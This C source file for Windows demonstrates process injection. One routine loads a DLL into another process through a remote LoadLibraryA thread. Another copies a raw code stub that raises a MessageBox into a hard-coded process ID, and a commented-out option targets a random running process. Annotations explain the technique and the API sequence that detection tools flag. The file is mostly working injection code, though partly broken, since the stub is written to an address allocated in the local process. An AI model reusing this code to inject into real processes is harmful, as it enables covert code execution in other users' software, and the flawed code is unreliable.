//Coded By Sha0@BadCheckSum.com
//Visita http://www.BadCheckSum.com  y aprende con nosotros.

#include <windows.h>
#include <tlhelp32.h>
#include <string.h>
#include <time.h>
#include <stdlib.h>

#define PROCESO 380  // Hard-coded PID of the target process. Per the author's note it should be a process that owns a window, since the injected stub raises a MessageBox inside it.



// Parameter block that injecta copies verbatim into the target process and passes to the
// remote thread as its single argument. It carries the API pointers the injected stub
// needs, because the stub is copied as raw bytes and has no import table of its own.
// The layout is load-bearing: funcion reads it field by field from the other process,
// so fields must not be reordered or resized without changing both sides.
typedef struct {
    FARPROC load;     // LoadLibraryA, resolved by injecta
    FARPROC proc;     // GetProcAddress, resolved by injecta
    FARPROC modul;    // GetModuleHandle; filled in by injecta but never read by funcion
    FARPROC resul;    // written by funcion: the MessageBoxA pointer it resolves
    HMODULE hResul;   // written by funcion: the module handle returned for user32
    char     msg[50];   // MessageBox text; also used as the caption
    char    user32[20]; // "user32.dll"
    char    msgbox[20]; // "MessageBoxA"
} param;    


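// Returns a pseudo-random integer in [0, maxvalue).
//
// The generator is reseeded from the current wall-clock second on every call, so
// repeated calls within the same second return the same value; that is the original
// behaviour and is kept as is.
//
// maxvalue: exclusive upper bound. Values <= 0 would make `rand() % maxvalue` divide
//           by zero (undefined behaviour); they now return 0 instead.
int do_random (int maxvalue) {
    if (maxvalue <= 0) {
        return 0;
    }

    time_t t;
    time (&t);
    struct tm *ahora = localtime (&t);
    // localtime() may return NULL; fall back to the raw timestamp as the seed rather
    // than dereferencing a null pointer.
    srand(ahora != NULL ? (unsigned)ahora->tm_sec : (unsigned)t);

    return rand()%maxvalue;
}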

// Author's note (translated): code injected into a new thread of another process without
// using a DLL; the author remarks that computing a delta offset would be a better design.
//
// This is the stub that runs inside the target process. injecta copies this function's
// raw bytes across, so it may use only what reaches it through `pp`: it loads user32 via
// the LoadLibraryA pointer, resolves MessageBoxA via the GetProcAddress pointer, and
// calls it with pp->msg as both text and caption. Resolving imports at run time through
// a caller-supplied pointer table is the same shape as position-independent shellcode,
// which is why this pattern is a common memory-scanning heuristic. pp->modul is never
// read here.
void funcion (param *pp) {
    pp->hResul = (HMODULE)pp->load(pp->user32);
    pp->resul = (FARPROC)pp->proc(pp->hResul,pp->msgbox);
    // Call through FARPROC with an argument list; the pointer type has no prototype,
    // so the compiler performs no argument checking on this call.
    pp->resul (0,pp->msg,pp->msg,0);
    return;
}    

// Empty marker placed directly after funcion so that injecta can compute the stub's size
// as (LPBYTE)funcion_length - (LPBYTE)funcion. This relies on the compiler emitting the
// two functions adjacently and in source order, which C does not guarantee.
void funcion_length (void) {
}  


// Classic LoadLibrary injection: writes a DLL path into the target process and starts a
// remote thread at kernel32!LoadLibraryA with that path as its argument, so the target
// loads the DLL itself. Not called from main in this file.
//
// From a defender's view, the sequence OpenProcess(0x1f0fff, PROCESS_ALL_ACCESS as
// defined in older SDKs) -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory
// -> CreateRemoteThread is the canonical injection signature that host telemetry flags.
//
// pid: process id of the target. No return value; none of the API results are checked.
void injectadll (DWORD pid) {
    DWORD bytesread;   // receives the byte count written by WriteProcessMemory, despite the name
    DWORD size = 0x39; // hard-coded remote allocation size; sizeof(laura) fits within it
    HMODULE hKernel = GetModuleHandle ("Kernel32");
    char laura[]="c:\\dev-cpp\\experiments\\dll\\fuck.dll";  // absolute, build-machine-specific path

    HANDLE hProcess = OpenProcess (0x1f0fff,0,pid);
    DWORD *vd = VirtualAllocEx (hProcess,0,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    WriteProcessMemory (hProcess,vd,&laura,sizeof(laura),&bytesread);   // &laura and laura are the same address here
    HANDLE hThread = CreateRemoteThread (hProcess,NULL,0,(LPTHREAD_START_ROUTINE) GetProcAddress(hKernel,"LoadLibraryA"), vd, 0, NULL);
    WaitForSingleObject (hThread,INFINITE);   // block until LoadLibraryA returns in the target
    CloseHandle (hThread);
    VirtualFreeEx (hProcess,vd,size,MEM_RELEASE);
    CloseHandle (hProcess);   
}    


// DLL-less injection: copies the bytes of funcion and a filled-in param block into the
// target process and starts a remote thread on the copy. The param block carries
// resolved kernel32 pointers because the copied code has no imports of its own.
// Called by main with PROCESO.
//
// Same OpenProcess / VirtualAllocEx(RWX) / WriteProcessMemory / CreateRemoteThread
// sequence as injectadll, plus a raw code copy into an executable region. The cleanup at
// the end is commented out, so the process and thread handles and both allocations are
// left open when this returns.
//
// pid: target process id. No return value; API results are not checked.
void injecta (DWORD pid) {
    DWORD bytesread;   // byte count written by WriteProcessMemory, despite the name
    DWORD size = (LPBYTE)funcion_length-(LPBYTE)funcion;  // stub size, assuming funcion_length directly follows funcion
    HMODULE k = LoadLibrary ("kernel32");
    param pp,pg;   // pp is sent to the target; pg is only referenced by the commented-out read-back below
    
        
    pp.load = GetProcAddress (k,"LoadLibraryA");
    pp.proc = GetProcAddress (k,"GetProcAddress");
    pp.modul = GetProcAddress (k,"GetModuleHandle");   // filled in but never read by funcion
    strcpy (pp.msg,"Iniciando sesión.");   // message text ("Starting session."); fits msg[50]
    strcpy (pp.user32,"user32.dll");
    strcpy (pp.msgbox,"MessageBoxA");
  

  
    HANDLE hProcess = OpenProcess (0x1f0fff,0,pid);
    //DWORD *vf = VirtualAllocEx (hProcess,0,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    // vf is allocated in the current process with VirtualAlloc (the VirtualAllocEx
    // variant above is commented out); the same address is then used as the
    // WriteProcessMemory destination and as the remote thread's start address.
    DWORD *vf = VirtualAlloc (0,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    
    param *vd = (param *)VirtualAllocEx (hProcess,0,sizeof(param),MEM_COMMIT,PAGE_EXECUTE_READWRITE);   // remote copy of the param block
    WriteProcessMemory (hProcess,vf,&funcion,size,&bytesread);   // raw code bytes of funcion
    WriteProcessMemory (hProcess,vd,&pp,sizeof(param),&bytesread);
    HANDLE hThread = CreateRemoteThread (hProcess,0,0, (LPTHREAD_START_ROUTINE)vf, vd, 0, 0);   // entry = copied stub, argument = param block
    /*
    WaitForSingleObject (hThread,INFINITE);
    //ReadProcessMemory (hProcess, vd, &pg, sizeof(param),&bytesread);
    printf ("retvalue: 0x%x\n",pg.retvalue);
    CloseHandle (hThread);
    VirtualFree (vf,size,MEM_RELEASE);
    VirtualFreeEx (hProcess,vd,size,MEM_RELEASE);
    CloseHandle (hProcess);*/
}


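// Enumerates every process in a Toolhelp snapshot and returns the id of one chosen at
// random via do_random. Only referenced by the commented-out call in main.
//
// Returns 0 (the idle process's id, never a meaningful target) when the snapshot
// cannot be taken or yields no entries. The original wrote past pid[200] on systems
// with more than 200 processes and called do_random(0) on an empty table; enumeration
// now stops filling the table once it is full, and the empty case returns early.
DWORD busca_procesos (void) {
    enum { MAX_PIDS = 200 };
    DWORD pid[MAX_PIDS];
    int maxPid = 0;

    HANDLE hSnapshot = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS,0);
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        return 0;
    }

    PROCESSENTRY32 pe;
    pe.dwSize = sizeof(PROCESSENTRY32);

    BOOL retval = Process32First (hSnapshot, &pe);
    // Stop as soon as the table is full rather than overrunning it.
    while (retval && maxPid < MAX_PIDS) {
        pid[maxPid++] = pe.th32ProcessID;
        pe.dwSize=sizeof(PROCESSENTRY32);
        retval = Process32Next (hSnapshot,&pe);
    }

    CloseHandle (hSnapshot);

    if (maxPid == 0) {
        return 0;
    }
    // do_random(maxPid) yields an index in [0, maxPid).
    return pid[do_random(maxPid)];
}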



// Entry point: injects the MessageBox stub into the process with the hard-coded id
// PROCESO. The alternative that picks a random process via busca_procesos is left
// commented out.
int main (void) {
    //injecta (busca_procesos());    
    
    injecta (PROCESO);

    return 0;
}    


